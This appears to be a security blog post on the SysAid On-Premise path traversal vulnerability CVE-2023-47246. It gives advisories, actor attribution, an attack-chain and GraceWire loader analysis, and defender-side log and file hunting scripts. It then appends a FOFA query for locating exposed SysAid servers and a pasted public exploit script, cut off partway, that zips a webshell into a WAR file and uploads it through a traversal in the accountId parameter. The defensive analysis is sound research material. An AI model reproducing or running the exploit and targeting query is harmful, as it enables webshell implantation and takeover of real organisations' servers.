Introduction
On November 8, 2023, SysAid published an advisory for CVE-2023-47246, a critical zero-day vulnerability in its SysAid On-Premise software. SysAid describes it as a path traversal vulnerability that leads to code execution in the same software. This blog includes immediate recommendations for customers of the SysAid On-Premise software, best practices for long-term protection against this class of vulnerability, and a brief analysis of the attack chain.
Recommendations
SysAid recommends that customers of the on-premise software take the following two actions:
- Upgrade to version 23.3.6
- Perform a full system and network assessment to detect potential compromise
If any indicators of compromise (IoCs) are found, Zscaler recommends that SysAid On-Premise customers follow their incident response protocol and act immediately. In addition, Zscaler strongly recommends upgrading to the latest version. For more information on upgrading, see here and here.
Attribution
Lace Tempest (DEV-0950 / TA505) is believed to be the threat actor exploiting this vulnerability. The group was responsible for exploiting the MOVEit Transfer vulnerability earlier this year and is associated with the ransomware group known as "CL0P".
Figure 1: Attack chain showing how the threat actor exploits CVE-2023-47246 to infiltrate SysAid systems
Possible Execution
How It Works
The threat actor exploited the SysAid CVE-2023-47246 path traversal vulnerability to upload a WAR archive containing a WebShell and various payloads into the webroot of the SysAid Tomcat web service. The vulnerability lies in the doPost method of the SysAid com.ilient.server.UserEntry class. Exploitation involves manipulating the accountID parameter to introduce a path traversal, which lets the attacker control where the WebShell is written on the vulnerable server. The attack is carried out by sending a POST request whose body is a compressed WAR file containing the WebShell. The threat actor then accesses the WebShell, which allows them to interact with the compromised system.
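As an added defender-side example (not code from the original post or from SysAid), the following Python scans constructed Tomcat access-log lines for POST requests to the /userentry endpoint whose accountId parameter carries a traversal sequence, percent-decoding repeatedly so encoded variants are still caught. The log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Tomcat access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Nov/2023:10:15:02 +0000] "POST /userentry?accountId=/../../../tomcat/webapps/ABC123/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 200 512
10.0.0.9 - - [08/Nov/2023:10:15:10 +0000] "POST /userentry?accountId=%2F..%2F..%2F..%2Ftomcat%2Fwebapps%2FXYZ%2F&symbolName=x HTTP/1.1" 200 512
192.168.1.20 - - [08/Nov/2023:10:16:30 +0000] "POST /userentry?accountId=12345&symbolName=home HTTP/1.1" 200 1024
192.168.1.21 - - [08/Nov/2023:10:17:00 +0000] "GET /ABC123/shell.jsp HTTP/1.1" 200 233
"""

# Common Log Format request line; the status code is enough for triage here.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'\.\.[/\\]')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ is still visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding dict if the line is a POST to /userentry whose
    accountId contains a traversal sequence, otherwise None."""
    m = LINE_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.lower().rstrip("/") != "/userentry":
        return None
    params = parse_qs(parts.query, keep_blank_values=True)   # decodes one layer
    for raw in params.get("accountId", []) + params.get("accountID", []):
        account_id = decode_fully(raw)
        if TRAVERSAL.search(account_id):
            return {"ip": m.group("ip"), "ts": m.group("ts"),
                    "status": m.group("status"), "accountId": account_id}
    return None

def scan_log(text):
    """Run inspect_line over every line and return the findings in order."""
    return [f for f in map(inspect_line, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 response to such a request, followed by GET requests into a webapp directory that did not exist before, is the pattern to escalate.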
PowerShell used to execute GraceWire
The threat actor used the unauthorized access to deploy a PowerShell script that runs the GraceWire loader on the victim's machine.
The PowerShell script (shown below) enumerates all files in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory and then checks for antivirus or anti-malware processes whose names start with "Sophos". If the script detects such security software running on the victim's system, it exits to avoid detection.
If the script does not detect antivirus or anti-malware software, it executes the GraceWire loader (user.exe) on the victim's machine.
Figure 2: PowerShell script used to launch the GraceWire loader (user.exe)
GraceWire loader analysis
The GraceWire loader follows a sequence of steps. First, it checks for a file named <filename>.bin that contains the encrypted payload. If the file exists in the current directory, the loader reads its contents with the ReadFile() function and stores the data in allocated memory. It then decrypts the data and computes a checksum. If the checksum verifies correctly, the program executes the decrypted bin payload, which is designed to deploy the GraceWire trojan. The loader also injects the GraceWire trojan into various processes, including:
- spoolsv.exe
- msiexec.exe
- svchost.exe
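Covering both the PowerShell stage above and the loader's <filename>.bin convention, here is an added hunting script (not from the original post) that walks a SysAidServer directory tree: it flags webapp directories outside an allowlist, dropped archives or scripts under usersfiles, and any EXE that sits beside a same-named .bin. The allowlist, file names and directory layout are assumptions built in a temporary directory.

```python
import tempfile
from pathlib import Path

# Assumption: the deployments a stock install is expected to have; tune this allowlist.
EXPECTED_WEBAPPS = {"ROOT", "sysaid", "usersfiles"}
SUSPICIOUS_SUFFIXES = (".war", ".jsp", ".ps1")

def hunt(server_root):
    """Return sorted (category, path) findings under a SysAidServer root directory."""
    webapps = Path(server_root) / "tomcat" / "webapps"
    findings = []
    if not webapps.is_dir():
        return findings
    # 1. Any webapp directory outside the allowlist (the traversal writes a new
    #    random-name directory under tomcat/webapps).
    for entry in webapps.iterdir():
        if entry.is_dir() and entry.name not in EXPECTED_WEBAPPS:
            findings.append(("unexpected-webapp", str(entry)))
    # 2. Inside usersfiles: dropped archives/scripts, and a loader EXE paired with
    #    a same-named .bin (the encrypted payload the GraceWire loader looks for).
    usersfiles = webapps / "usersfiles"
    if usersfiles.is_dir():
        files = {str(p.relative_to(usersfiles)).lower(): p
                 for p in usersfiles.rglob("*") if p.is_file()}
        for name, path in files.items():
            if name.endswith(SUSPICIOUS_SUFFIXES):
                findings.append(("suspicious-upload", str(path)))
            elif name.endswith(".exe") and name[:-4] + ".bin" in files:
                findings.append(("loader-with-bin", str(path)))
    return sorted(findings)

def build_demo_tree():
    """Create a throwaway directory tree with constructed artefacts for the demo."""
    base = Path(tempfile.mkdtemp(prefix="sysaid-hunt-demo-"))
    webapps = base / "tomcat" / "webapps"
    for clean in ("ROOT", "sysaid", "usersfiles"):
        (webapps / clean).mkdir(parents=True)
    for name in ("user.exe", "user.bin", "dropped.war", "invoice.pdf"):
        (webapps / "usersfiles" / name).write_bytes(b"demo")   # constructed, not malware
    (webapps / "QX7P2M").mkdir()                                # constructed random dir name
    (webapps / "QX7P2M" / "shell.jsp").write_text("demo")
    return base

if __name__ == "__main__":
    for category, path in hunt(build_demo_tree()):
        print(f"{category:18} {path}")
```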
While examining the code, we also found debug print statements that reveal the control flow of the GraceWire loader.
Figure 3: Screenshot of debug print statements showing the control flow of the GraceWire loader
Eliminating evidence
Once inside the victim's system, the threat actor uses another PowerShell script to systematically erase traces and evidence associated with their malicious activity. This post-exploitation tactic aims to remove the digital footprint and minimize the likelihood of detection by eliminating indicators of compromise (IoCs).
Possible additional exploitation
Microsoft published a tweet highlighting the exploitation of this vulnerability in CL0P ransomware activity and strongly recommending that systems be updated.
In addition, SysAid found supporting evidence that the following PowerShell command was used to download and execute Cobalt Strike.
Figure 4: PowerShell command that downloads and executes Cobalt Strike
Best practices
- Protect crown-jewel applications by limiting lateral movement with Zscaler Private Access, especially with the Application Security module enabled.
- Route all server traffic through Zscaler Private Access and Zscaler Internet Access with the additional Application Security module enabled; this provides the visibility needed to identify and block malicious activity from compromised systems/servers.
- Turn on Zscaler Advanced Threat Protection to block all known command-and-control domains. This provides additional protection if the adversary uses this vulnerability to implant malware.
- Use Zscaler Cloud Firewall (Cloud IPS module) to extend command-and-control protection to all ports and protocols, including emerging C2 destinations. Again, this provides additional protection if the adversary uses this vulnerability to implant malware.
- Use Zscaler Cloud Sandbox to prevent unknown malware delivered as part of a second-stage payload.
- Ensure you are inspecting all SSL traffic.
- Restrict traffic to critical infrastructure to an allowed list of known-good destinations.
FOFA
body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href="http://www.sysaid.com">by SysAid</a>"
https://github.com/W01fh4cker/CVE-2023-47246-EXP/blob/main/CVE-2023-47246-EXP.py
import argparse
import binascii
import random
import time
import zipfile
import zlib
import urllib3
import requests
urllib3.disable_warnings()
def compressFile(shellFile, warFile):
    try:
        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
            zipf.write(shellFile)
            zipf.close()
        return True
    except:
        return False
def getHexData(warFile):
    with open(warFile, 'rb') as warfile:
        data = warfile.read()
        warfile.close()
    compressed_data = zlib.compress(data)
    hex_data = binascii.hexlify(compressed_data).decode()
    return hex_data
def generateRandomDirectoryName(num):
    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    return ''.join(random.choice(charset) for _ in range(num))
def get_random_agent():
    agent_list = [
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/52.0.2743.84 Mobile/13G35 Safari/601.1.46',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'
    ]
    return agent_list[random.randint(0, len(agent_list) - 1)]
def shellUpload(url, proxy, directoryName, shellFile):
    userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": get_random_agent()
    }
    shellFileName = shellFile.split(".")[0]
    warFile = f"{shellFileName}.war"
    if compressFile(shellFile, warFile):
        shellHex = getHexData(warFile=warFile)
        data = binascii.unhexlify(shellHex)
        resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
        print("\033[92m[+] Shell file compressed successfully!\033[0m")
        return resp
    else:
        print("\033[91m[x] Shell file compression failed.\033[0m")
        exit(0)
def shellTest(url, proxy, directoryName, shellFile):
    userEntryUrl = f"{url}/{directoryName}/{shellFile}"
    headers = {
        "User-Agent": get_random_agent()
    }
    resp = requests.get(url=userEntryUrl, headers=headers, timeout=15, proxies=proxy, verify=False)
    return resp, userEntryUrl
def exploit(url, proxy, shellFile):
    print(f"\033[94m[*] start to attack: {url}